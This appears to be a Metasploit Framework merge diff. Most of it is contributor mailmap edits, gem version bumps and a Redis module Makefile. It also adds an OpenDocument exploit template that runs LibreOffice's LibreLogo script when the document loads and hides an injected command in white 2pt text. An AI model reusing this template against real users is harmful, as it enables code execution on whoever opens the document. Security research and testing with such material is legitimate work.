Land #12244 , cisco_ucs_scpuser exploit

Land #12243 , cisco_ucs_rce exploit
Land #12059 , cisco_dcnm_download aux module
2019-08-30 13:35:50 -05:00 · 2019-08-30 13:35:29 -05:00 · 2019-08-30 13:35:00 -05:00 · 2019-08-30 13:33:19 -05:00 · 2019-08-30 13:32:25 -05:00 · 2019-08-30 13:23:00 -05:00
316 changed files with 26410 additions and 6360 deletions
@@ -1,48 +1,29 @@
 acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
 acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
 acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
-asoto-r7 <asoto-r7@github>           <aaron_soto@rapid7.com>
 bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
-bpatterson-r7 <bpatterson-r7@github> <Brian_Patterson@rapid7.com>
 bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
 bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
 dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
-dmaloney-r7 <dmaloney-r7@github>     <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     <Dev_Mohanty@rapid7.com>
+dwelch-r7 <dwelch-r7@github>         <dean_welch@rapid7.com>
 ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
-egypt <egypt@github>                 <egypt@metasploit.com> # aka egypt
-egypt <egypt@github>                 <james_lee@rapid7.com>
 jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
 jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
-jhart-r7 <jhart-r7@github>           <jon_hart@rapid7.com>
 jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
 jinq102030 <jinq102030@github>       <jqian@rapid7.com>
 jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
-kgray-r7 <kgray-r7@github>           <kyle_gray@rapid7.com>
-khayes-r7 <khayes-r7@github>         <Kirk_Hayes@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
 lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
 lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
 mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
 pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
 shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
 space-r7 <space-r7@github>           <shelby_pace@rapid7.com>
-tatanus <tatanus@github>             <adam_compton@rapid7.com>
 tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>             <todb@metasploit.com>
@@ -53,7 +34,6 @@ wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
 wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
 wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
 wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -62,9 +42,12 @@ wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

+asoto-r7 <asoto-r7@github>             <aaron_soto@rapid7.com>
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github>   <bpatterson@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github>   <Brian_Patterson@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
@@ -83,8 +66,13 @@ corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <pete
 crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmail.com>
+dmaloney-r7 <dmaloney-r7@github>       <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>       <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>       <Dev_Mohanty@rapid7.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
+egypt <egypt@github>                   <egypt@metasploit.com> # aka egypt
+egypt <egypt@github>                   <james_lee@rapid7.com>
 espreto <espreto@github>               <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
 farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
@@ -110,6 +98,7 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
+jhart-r7 <jhart-r7@github>             <jon_hart@rapid7.com>
 joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
@@ -119,9 +108,15 @@ juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@kernelsmith.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@metasploit.com>
 kernelsmith <kernelsmith@github>       kernelsmith <kernelsmith@kernelsmith>
+kgray-r7 <kgray-r7@github>             <kyle_gray@rapid7.com>
 kost <kost@github>                     Vlatko Kosturjak <kost@linux.hr>
 kris <kris@???>                        kris <>
 KronicDeth <KronicDeth@github>         Luke Imhoff <luke_imhoff@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@rapid7.com>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
@@ -151,12 +146,16 @@ rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
+sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
 stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
+tatanus <tatanus@github>               <adam_compton@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <techpeace@gmail.com>
 timwr <timwr@github>                   <timrlw@gmail.com>
@@ -164,6 +163,7 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
+wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 void-in <void-in@github>               void_in <root@localhost.localdomain>
 void-in <void-in@github>               void-in <root@localhost.localdomain>
 void-in <void-in@github>               <void-in@users.noreply.github.com>
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.35)
+    metasploit-framework (5.0.44)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -9,7 +9,7 @@ PATH
      aws-sdk-iam
      aws-sdk-s3
      backports
-      bcrypt
+      bcrypt (= 3.1.12)
      bcrypt_pbkdf
      bit-struct
      concurrent-ruby (= 1.0.5)
@@ -112,32 +112,32 @@ GEM
      public_suffix (>= 2.0.2, < 4.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.9.1)
+    arel-helpers (2.10.0)
      activerecord (>= 3.1.0, < 7)
    aws-eventstream (1.0.3)
-    aws-partitions (1.180.0)
-    aws-sdk-core (3.56.0)
+    aws-partitions (1.207.0)
+    aws-sdk-core (3.65.1)
      aws-eventstream (~> 1.0, >= 1.0.2)
      aws-partitions (~> 1.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.96.0)
-      aws-sdk-core (~> 3, >= 3.56.0)
+    aws-sdk-ec2 (1.106.0)
+      aws-sdk-core (~> 3, >= 3.61.1)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.26.0)
-      aws-sdk-core (~> 3, >= 3.56.0)
+    aws-sdk-iam (1.29.0)
+      aws-sdk-core (~> 3, >= 3.61.1)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.22.0)
-      aws-sdk-core (~> 3, >= 3.56.0)
+    aws-sdk-kms (1.24.0)
+      aws-sdk-core (~> 3, >= 3.61.1)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.43.0)
-      aws-sdk-core (~> 3, >= 3.56.0)
+    aws-sdk-s3 (1.47.0)
+      aws-sdk-core (~> 3, >= 3.61.1)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
    aws-sigv4 (1.1.0)
      aws-eventstream (~> 1.0, >= 1.0.2)
    backports (3.15.0)
-    bcrypt (3.1.13)
+    bcrypt (3.1.12)
    bcrypt_pbkdf (1.0.1)
    bindata (2.4.4)
    bit-struct (0.16)
@@ -148,7 +148,7 @@ GEM
    crass (1.0.4)
    daemons (1.3.1)
    diff-lcs (1.3)
-    dnsruby (1.61.2)
+    dnsruby (1.61.3)
      addressable (~> 2.5)
    docile (1.3.2)
    ed25519 (1.2.4)
@@ -160,7 +160,6 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    equatable (0.6.1)
    erubis (2.7.0)
    eventmachine (1.2.7)
    factory_bot (5.0.2)
@@ -168,13 +167,8 @@ GEM
    factory_bot_rails (5.0.2)
      factory_bot (~> 5.0.2)
      railties (>= 4.2.0)
-    faker (1.9.4)
-      i18n (>= 0.7)
-      pastel (~> 0.7.2)
-      thor (~> 0.20.0)
-      tty-pager (~> 0.12.0)
-      tty-screen (~> 0.6.5)
-      tty-tree (~> 0.3.0)
+    faker (2.2.0)
+      i18n (>= 0.8)
    faraday (0.15.4)
      multipart-post (>= 1.2, < 3)
    filesize (0.2.0)
@@ -225,13 +219,13 @@ GEM
    mini_portile2 (2.4.0)
    minitest (5.11.3)
    mqtt (0.5.0)
-    msgpack (1.3.0)
+    msgpack (1.3.1)
    multipart-post (2.1.1)
    nessus_rest (0.1.6)
    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.3)
+    nokogiri (1.10.4)
      mini_portile2 (~> 2.4.0)
    octokit (4.14.0)
      sawyer (~> 0.8.0, >= 0.5.3)
@@ -239,12 +233,9 @@ GEM
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
-    pastel (0.7.3)
-      equatable (~> 0.6)
-      tty-color (~> 0.5)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
-    pdf-reader (2.2.0)
+    pdf-reader (2.2.1)
      Ascii85 (~> 1.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
@@ -271,18 +262,18 @@ GEM
      activesupport (>= 4.2.0, < 5.0)
      nokogiri (~> 1.6)
      rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.0.4)
+    rails-html-sanitizer (1.2.0)
      loofah (~> 2.2, >= 2.2.2)
    railties (4.2.11.1)
      actionpack (= 4.2.11.1)
      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (12.3.2)
+    rake (12.3.3)
    rb-readline (0.5.5)
    recog (2.3.2)
      nokogiri
-    redcarpet (3.4.0)
+    redcarpet (3.5.0)
    rex-arch (0.1.13)
      rex-text
    rex-bin_tools (0.1.6)
@@ -326,7 +317,7 @@ GEM
      rex-socket
      rex-text
    rex-struct2 (0.1.2)
-    rex-text (0.2.21)
+    rex-text (0.2.23)
    rex-zip (0.1.3)
      rex-text
    rkelly-remix (0.0.7)
@@ -334,7 +325,7 @@ GEM
      rspec-core (~> 3.8.0)
      rspec-expectations (~> 3.8.0)
      rspec-mocks (~> 3.8.0)
-    rspec-core (3.8.1)
+    rspec-core (3.8.2)
      rspec-support (~> 3.8.0)
    rspec-expectations (3.8.4)
      diff-lcs (>= 1.2.0, < 2.0)
@@ -364,7 +355,7 @@ GEM
    sawyer (0.8.2)
      addressable (>= 2.3.5)
      faraday (> 0.8, < 2.0)
-    simplecov (0.16.1)
+    simplecov (0.17.0)
      docile (~> 1.1)
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
@@ -375,11 +366,6 @@ GEM
      tilt (>= 1.3, < 3)
    sqlite3 (1.3.13)
    sshkey (2.0.0)
-    strings (0.1.5)
-      strings-ansi (~> 0.1)
-      unicode-display_width (~> 1.5)
-      unicode_utils (~> 1.4)
-    strings-ansi (0.1.0)
    swagger-blocks (2.0.2)
    thin (1.7.2)
      daemons (~> 1.0, >= 1.0.9)
@@ -390,20 +376,10 @@ GEM
    tilt (2.0.9)
    timecop (0.9.1)
    ttfunk (1.5.1)
-    tty-color (0.5.0)
-    tty-pager (0.12.1)
-      strings (~> 0.1.4)
-      tty-screen (~> 0.6)
-      tty-which (~> 0.4)
-    tty-screen (0.6.5)
-    tty-tree (0.3.0)
-    tty-which (0.4.1)
    tzinfo (1.2.5)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2019.1)
+    tzinfo-data (1.2019.2)
      tzinfo (>= 1.0.0)
-    unicode-display_width (1.6.0)
-    unicode_utils (1.4.0)
    warden (1.2.7)
      rack (>= 1.0)
    windows_error (0.1.2)
@@ -411,7 +387,7 @@ GEM
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.19)
+    yard (0.9.20)

 PLATFORMS
  ruby
@@ -8,17 +8,17 @@ activesupport, 4.2.11.1, MIT
 addressable, 2.6.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.9.1, MIT
+arel-helpers, 2.10.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.180.0, "Apache 2.0"
-aws-sdk-core, 3.56.0, "Apache 2.0"
-aws-sdk-ec2, 1.96.0, "Apache 2.0"
-aws-sdk-iam, 1.26.0, "Apache 2.0"
-aws-sdk-kms, 1.22.0, "Apache 2.0"
-aws-sdk-s3, 1.43.0, "Apache 2.0"
+aws-partitions, 1.207.0, "Apache 2.0"
+aws-sdk-core, 3.65.1, "Apache 2.0"
+aws-sdk-ec2, 1.106.0, "Apache 2.0"
+aws-sdk-iam, 1.29.0, "Apache 2.0"
+aws-sdk-kms, 1.24.0, "Apache 2.0"
+aws-sdk-s3, 1.47.0, "Apache 2.0"
 aws-sigv4, 1.1.0, "Apache 2.0"
 backports, 3.15.0, MIT
-bcrypt, 3.1.13, MIT
+bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
@@ -30,17 +30,16 @@ cookiejar, 0.3.3, unknown
 crass, 1.0.4, MIT
 daemons, 1.3.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.61.2, "Apache 2.0"
+dnsruby, 1.61.3, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
-equatable, 0.6.1, MIT
 erubis, 2.7.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 5.0.2, MIT
 factory_bot_rails, 5.0.2, MIT
-faker, 1.9.4, MIT
+faker, 2.2.0, MIT
 faraday, 0.15.4, MIT
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
@@ -54,7 +53,7 @@ loofah, 2.2.3, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.35, "New BSD"
+metasploit-framework, 5.0.44, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
 metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
@@ -63,21 +62,20 @@ method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.11.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.0, "Apache 2.0"
+msgpack, 1.3.1, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.3, MIT
+nokogiri, 1.10.4, MIT
 octokit, 4.14.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
-pastel, 0.7.3, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.2.0, MIT
+pdf-reader, 2.2.1, MIT
 pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
@@ -88,12 +86,12 @@ rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
-rails-html-sanitizer, 1.0.4, MIT
+rails-html-sanitizer, 1.2.0, MIT
 railties, 4.2.11.1, MIT
-rake, 12.3.2, MIT
+rake, 12.3.3, MIT
 rb-readline, 0.5.5, BSD
 recog, 2.3.2, unknown
-redcarpet, 3.4.0, MIT
+redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
@@ -107,14 +105,14 @@ rex-powershell, 0.1.82, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.18, "New BSD"
+rex-socket, 0.1.17, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.21, "New BSD"
+rex-text, 0.2.23, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.8.0, MIT
-rspec-core, 3.8.1, MIT
+rspec-core, 3.8.2, MIT
 rspec-expectations, 3.8.4, MIT
 rspec-mocks, 3.8.1, MIT
 rspec-rails, 3.8.2, MIT
@@ -126,13 +124,11 @@ ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
 rubyzip, 1.2.3, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.16.1, MIT
+simplecov, 0.17.0, MIT
 simplecov-html, 0.10.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
-strings, 0.1.5, MIT
-strings-ansi, 0.1.0, MIT
 swagger-blocks, 2.0.2, MIT
 thin, 1.7.2, "GPLv2+, Ruby 1.8"
 thor, 0.20.3, MIT
@@ -140,17 +136,10 @@ thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.9, MIT
 timecop, 0.9.1, MIT
 ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tty-color, 0.5.0, MIT
-tty-pager, 0.12.1, MIT
-tty-screen, 0.6.5, MIT
-tty-tree, 0.3.0, MIT
-tty-which, 0.4.1, MIT
 tzinfo, 1.2.5, MIT
-tzinfo-data, 1.2019.1, MIT
-unicode-display_width, 1.6.0, MIT
-unicode_utils, 1.4.0, unknown
+tzinfo-data, 1.2019.2, MIT
 warden, 1.2.7, MIT
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.19, MIT
+yard, 0.9.20, MIT
@@ -0,0 +1,42 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:settings><config:config-item-set config:name="ooo:configuration-settings"><config:config-item config:name="LoadReadonly" config:type="boolean">true</config:config-item></config:config-item-set></office:settings>
+ <office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:LibreLogo|LibreLogo.py$run?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners></office:scripts>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text" fo:color="#ffffff"/>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="20%"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
+  <style:style style:name="P8" style:family="paragraph" style:parent-style-name="Preformatted_20_Text"><style:text-properties fo:color="#ffffff" fo:font-size="2pt" officeooo:rsid="00443c94" officeooo:paragraph-rsid="00443c94" style:font-size-asian="2pt" style:font-size-complex="2pt"/></style:style>
+ </office:styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
+  <text:p text:style-name="P8"><%= @cmd %></text:p>
+  <text:p text:style-name="Standard">#<%= text_content %></text:p>
+  </office:text>
+ </office:body>
+</office:document>
@@ -0,0 +1,35 @@
+#set environment variable RM_INCLUDE_DIR to the location of redismodule.h
+ifndef RM_INCLUDE_DIR
+	RM_INCLUDE_DIR=./
+endif
+
+ifndef RMUTIL_LIBDIR
+	RMUTIL_LIBDIR=./rmutil
+endif
+
+# find the OS
+uname_S := $(shell sh -c 'uname -s 2>/dev/null || echo not')
+
+# Compile flags for linux / osx
+ifeq ($(uname_S),Linux)
+	SHOBJ_CFLAGS ?=  -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -shared -Bsymbolic
+else
+	SHOBJ_CFLAGS ?= -dynamic -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -bundle -undefined dynamic_lookup
+endif
